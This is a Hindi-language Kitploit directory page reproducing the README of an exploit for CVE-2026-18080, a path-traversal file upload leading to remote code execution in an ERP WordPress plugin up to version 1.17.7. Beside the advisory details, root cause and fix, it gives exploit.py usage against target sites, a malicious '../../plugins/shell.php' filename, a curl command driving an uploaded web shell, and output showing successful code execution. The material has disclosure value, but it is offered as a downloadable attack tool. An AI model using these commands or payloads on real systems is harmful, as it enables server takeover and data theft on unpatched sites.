Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
By-Poloss..-..CVE-2026-18080 — CVE-2026-18080 के लिए एक्सप्लॉइट, ERP Complete HR, Accounting & CRM Suite में अनधिकृत मनमाना फ़ाइल अपलोड जो RCE की ओर ले जाता है। स्वचालित शोषण के लिए Python और PHP स्क्रिप्ट शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/polosss/by-poloss..-..cve-2026-18080
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubpolosss/by-poloss..-..cve-2026-18080

By-Poloss..-..CVE-2026-18080

CVE-2026-18080 के लिए एक्सप्लॉइट, ERP Complete HR, Accounting & CRM Suite में अनधिकृत मनमाना फ़ाइल अपलोड जो RCE की ओर ले जाता है। स्वचालित शोषण के लिए Python और PHP स्क्रिप्ट शामिल हैं।

रिपॉजिटरी देखें
820 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-18080 — ERP Complete HR, Accounting & CRM Suite <= 1.17.7

बिना प्रमाणीकरण के मनमाना फ़ाइल अपलोड CRM Email Connect IMAP अटैचमेंट के माध्यम से (Path Traversal → RCE)

फ़ील्डमान
CVEhttps://nvd.nist.gov/vuln/detail/CVE-2026-18080
Wordfencehttps://www.wordfence.com/threat-intel/vulnerabilities/id/b9d11eb9-5e18-459f-a9d4-cccb1d593402
पैचhttps://plugins.trac.wordpress.org/changeset/3656848/erp
CVSS9.8 (क्रिटिकल)
CWECWE-434 (खतरनाक प्रकार की फ़ाइल का अप्रतिबंधित अपलोड)
प्रभावितERP प्लगइन संस्करण <= 1.17.7 (1.17.8 में ठीक किया गया)

विवरण

ERP प्लगइन का GmailSync.php में save_attachments() फ़ंक्शन IMAP से आने वाले ईमेल अटैचमेंट को बिना पाथ नॉर्मलाइज़ेशन के प्रोसेस करता है। एक हमलावर ../../plugins/shell.php जैसे फ़ाइलनाम और प्लगइन के अपेक्षित पैटर्न से मेल खाते हुए नकली References हेडर वाला ईमेल तैयार कर सकता है। क्रॉन-आधारित IMAP सिंक जॉब फ़ाइल को .htaccess-सुरक्षित crm-attachments/ निर्देशिका के बाहर wp-content/ के अंतर्गत किसी भी लिखने योग्य पथ में लिख देता है।

मूल कारण

GmailSync.php (v1.17.7) में:

root@kitploit:~
$name = $item['name'];              // कोई basename() या पाथ नॉर्मलाइज़ेशन नहीं
$file = wp_check_filetype( $item['name'] );
// ...
$saved = $wp_filesystem->put_contents( $dir . $name, $item['data'] );

फ़ाइलनाम ../../plugins/shell.php को $dir (wp-content/uploads/crm-attachments/) के साथ जोड़ने पर wp-content/plugins/shell.php प्राप्त होता है — एक ऐसी निर्देशिका जहाँ PHP निष्पादन की अनुमति है।

फिक्स (v1.17.8) में sanitize_attachment_filename() जोड़ा गया है जो basename() के माध्यम से निर्देशिका घटकों को हटाता है, पाथ सेपरेटर को अस्वीकार करता है, और खतरनाक एक्सटेंशन को ब्लॉक करता है।

शोषण

विधि 1: प्रत्यक्ष (wp-cli)

root@kitploit:~
python3 exploit.py -t https://wordpress.ddev.site

विधि 2: कस्टम पाथ और शेल नाम

root@kitploit:~
python3 exploit.py -t https://target.com --shell evil.php --path themes

विधि 3: phpinfo प्रोब

root@kitploit:~
python3 exploit.py -t https://target.com --phpinfo

सफल अपलोड के बाद:

root@kitploit:~
curl -X POST -d 'cmd=id' 'https://target.com/wp-content/plugins/cve-2026-18080.php'

प्रूफ ऑफ कॉन्सेप्ट

root@kitploit:~
RESULT: [{"name":"../../plugins/cve-2026-18080.php","slug":"../../plugins/cve-2026-18080.php","path":".../crm-attachments/../../plugins/cve-2026-18080.php"}]
SUCCESS: wp-content/plugins/cve-2026-18080.php (57 bytes)
RCE: uid=1000(god) gid=1000(god)

फ़ाइलें

फ़ाइलविवरण
exploit.pywp-cli का उपयोग करने वाली Python शोषण स्क्रिप्ट
exploit.phpwp eval-file के लिए स्टैंडअलोन PHP शोषण
README.mdयह फ़ाइल
टूल डाउनलोड करें